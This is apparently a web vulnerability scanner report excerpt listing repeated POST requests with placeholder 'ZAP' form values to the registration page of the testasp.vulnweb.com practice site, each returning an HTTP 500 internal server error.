POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
